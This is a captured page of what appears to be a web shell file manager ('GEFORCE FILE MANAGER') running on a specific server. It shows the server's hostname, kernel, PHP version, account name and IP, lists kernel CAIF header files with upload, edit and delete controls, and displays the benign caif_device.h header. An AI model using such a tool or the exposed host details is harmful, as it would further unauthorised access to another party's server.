[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.56.1.el8_10.x86_64
/
include
/
net
/
caif
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 caif_dev.h
4,441 B
SET
[ EDIT ]
|
[ DEL ]
📄 caif_device.h
1,878 B
SET
[ EDIT ]
|
[ DEL ]
📄 caif_hsi.h
5,282 B
SET
[ EDIT ]
|
[ DEL ]
📄 caif_layer.h
8,921 B
SET
[ EDIT ]
|
[ DEL ]
📄 caif_spi.h
4,200 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfcnfg.h
2,535 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfctrl.h
3,510 B
SET
[ EDIT ]
|
[ DEL ]
📄 cffrml.h
626 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfmuxl.h
594 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfpkt.h
6,477 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfserl.h
269 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfsrvl.h
1,810 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: caif_device.h
/* * Copyright (C) ST-Ericsson AB 2010 * Author: Sjur Brendeland * License terms: GNU General Public License (GPL) version 2 */ #ifndef CAIF_DEVICE_H_ #define CAIF_DEVICE_H_ #include <linux/kernel.h> #include <linux/net.h> #include <linux/netdevice.h> #include <linux/caif/caif_socket.h> #include <net/caif/caif_device.h> /** * struct caif_dev_common - data shared between CAIF drivers and stack. * @flowctrl: Flow Control callback function. This function is * supplied by CAIF Core Stack and is used by CAIF * Link Layer to send flow-stop to CAIF Core. * The flow information will be distributed to all * clients of CAIF. * * @link_select: Profile of device, either high-bandwidth or * low-latency. This member is set by CAIF Link * Layer Device in order to indicate if this device * is a high bandwidth or low latency device. * * @use_frag: CAIF Frames may be fragmented. * Is set by CAIF Link Layer in order to indicate if the * interface receives fragmented frames that must be * assembled by CAIF Core Layer. * * @use_fcs: Indicate if Frame CheckSum (fcs) is used. * Is set if the physical interface is * using Frame Checksum on the CAIF Frames. * * @use_stx: Indicate STart of frame eXtension (stx) in use. * Is set if the CAIF Link Layer expects * CAIF Frames to start with the STX byte. * * This structure is shared between the CAIF drivers and the CAIF stack. * It is used by the device to register its behavior. * CAIF Core layer must set the member flowctrl in order to supply * CAIF Link Layer with the flow control function. * */ struct caif_dev_common { void (*flowctrl)(struct net_device *net, int on); enum caif_link_selector link_select; int use_frag; int use_fcs; int use_stx; }; #endif /* CAIF_DEVICE_H_ */